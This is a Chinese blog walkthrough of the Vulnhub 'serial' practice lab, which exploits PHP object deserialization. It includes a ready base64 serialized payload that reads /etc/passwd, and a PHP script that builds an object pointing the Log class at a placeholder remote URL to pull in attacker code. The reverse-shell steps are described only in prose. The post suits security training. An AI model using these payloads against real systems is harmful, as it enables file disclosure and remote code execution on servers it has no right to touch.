首页 > 其他分享 >反序列化靶机serial

反序列化靶机serial

时间:2024-08-02 14:52:44浏览次数:10  
标签:编码 序列化 kali base64 payload new serial 打开 靶机

1.安装靶场进行配置

2.打开kali扫描IP

nmap -PS -T4 192.168.245.0/24

3.物理机访问靶场

4.F12查看网络,刷新一下得到一串base64编码

5.进行base64解码,乱码为空格改为\x00,再次进行base64加密,得到payload如下

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

6.打开抓包替换为修改后的payload

7.将这一段复制到目录下,在浏览器中打开得到base64编码

<?php
  class Log {
    private $type_log = "http://xxx.xxx.xxx.xxx/xxx.txt";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));

8.返回burp抓包,修改base64编码为我们刚刚得到的编码

9.打开kali进行监听

10.使用命令让目标连接本地端口

11.可以发现监听成功

12.访问根目录发现敏感文件

13.得到用户名密码

14.反弹shell脚本并发送请求

标签:编码,序列化,kali,base64,payload,new,serial,打开,靶机
From: https://blog.csdn.net/weixin_53198216/article/details/140853009

相关文章

  • WEEK5|WEB Unserialize Again
    进入后是一个文件上传但是这里并没有漏洞点看cookie得到源码<?phphighlight_file(__FILE__);error_reporting(0);classstory{private$user='admin';public$pass;public$eating;public$God='false';publicfunction__wakeup(){......
  • VulnhubAI-web 1.0靶机详解
    项目地址https://www.vulnhub.com/entry/ai-web-1,353/实验过程将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知DC-8的一个ip地址为192.168.47.135扫描Ai-Web......
  • 反序列化漏洞vulhub靶场serial
    环境搭建下载https://download.vulnhub.com/serial/serial.zip解压出来就是这种 你会得到一个这样的文件,这里使用VMware新建一个虚拟机,这里记录比较重要的几部分。这里就是使用我们刚才下过来的。  漏洞过程详解1.信息收集打开靶机,在kali虚拟机中进行主机......
  • 15. 序列化模块json和pickle、os模块
    1.序列化模块 1.1序列化与反序列化(1)序列化将原本的python数据类型字典、列表、元组转换成json格式字符串的过程就叫序列化(2)反序列化将json格式字符串转换成python数据类型字典、列表、元组的过程就叫反序列化(3)为什么要序列化计算机文件中没有字典这种数据类型,将字典中......
  • Vulnhub靶机:JANGOW_ 1.0.1
    目录前言:一、安装虚拟机Jangow:1.0.1靶机二、Web部分前言:难度:简单,本文使用VirtualBox打开,下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova一、安装虚拟机Jangow:1.0.1靶机1.选择下载的Jangow:1.0.1的文件路径。不要放C盘,不要放C盘。放在自己能记住......
  • FristiLeaks靶机
    修改靶机MAC地址080027A5A67,靶机和kali都设置成桥接,混杂改为全允许主机发现,通过Mac地址找端口扫描nmap-sV-p-192.168.7.188浏览器访问80端口:使用dirb扫描靶机目录拼接/robots.txt拼接/cola,是个提示页面回到首页,尝试将fristi作为路径进行访问......
  • contiguous、continuous、continual、serial、adjacent、consecutive和successive的区
    contiguous:表示连续、完整、不间断。比如一张纸,它是contiguous的,撕开再拼上,他就只能是consecutive的continuous:表示某事一直持续,没有停顿serial:系列。表示一连串相同的或者类似的或者有共同特征的东西。强调共同特征。adjacent:相邻。与consecutive的区别是,consecutive强调没有......
  • 代码审计: ThinkPHP V6.0.12LTS反序列化漏洞复现
    这里写目录标题源码下载一、前缀知识事件回调:二、代码审计查找反序列化路由三、利用链分析构造exp源码下载在我的个人免费资源里面一、前缀知识事件回调:概念:在某个特定事件发生时,系统会调用预先定义好的函数(即回调函数)来处理该事件。回调函数通常作为参数传递给......
  • 3.校验,格式化,ModelSerializer使用
    【一】反序列化校验1)三层校验字段自己校验直接写在字段类的属性上局部钩子在序列化中写validata_字段名全局钩子#serializers.pyclassBookSerializer(serializers.Serializer):#1)name字段的要大于1小于10name=serializers.CharField(min_length=......
  • 2.Request,Response和序列化类
    【一】不同编码格式的http请求django视图类或视图函数的request#只针对post请求的urlencoded编码格式才有数据(<QueryDict:{"a":"a"}>)request.POST#请求地址框中获得数据(<QueryDict:{"a":["a"]}>)request.GET #只取一个request.GET.get('key')......